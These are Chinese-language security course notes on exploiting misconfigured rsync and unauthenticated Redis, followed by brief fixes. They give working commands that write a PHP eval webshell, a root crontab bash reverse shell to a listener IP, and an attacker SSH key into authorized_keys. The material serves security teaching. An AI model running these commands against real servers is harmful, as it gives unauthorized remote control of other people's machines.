本文爲蘇尚武老師運維安全課程課程筆記
- Rsync
rsync -avzP -e ’ssh -p 22 /tmp/ test@ip:/web/‘通過ssh傳輸
rsync+crontab
rsync+sersync
默認端口873
配置低級錯誤:使用root,關閉只讀,取消認證
通過掃描873端口,進行rsync上傳導網站根目錄 - python編寫rsync掃描腳本
掃描開放873端口
獲取rsync目錄
密碼嘗試 - redis配置不當
redis未授權訪問漏洞,造成linux挖礦 - 三種攻擊手法
- webshell:
進入控制檯
獲取網站路徑
config set dir /var/www/html
config set dbfilename shell.php
set x “<?php @eval($_POST[a]);?>”
save
然後可以通過php連接訪問網站中的程序 - 寫入crontab任務:
set x “\n* * * * * bash -i >& /dev/tcp/192.167.4.107/6666 0>&1\n”
config set dir /var/spool/cron/
config set dbfilename root
Save
Attack:nc -lvnp 6666 - 寫入ssh公鑰
(echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > foo.txt
cat foo.txt |redis-cli -h 192.168.4.106 -x set crackit
連接上去redis-cli -h 192.168.4.106設置
config set dir /root/.ssh/
config set dbfilename “authorized_keys”
save
可以直接通過ssh -i id_rsa.pub [email protected] - 修復redis
設置密碼
不要把redis暴露公網
普通權限啓動
降低普通用戶.ssh權限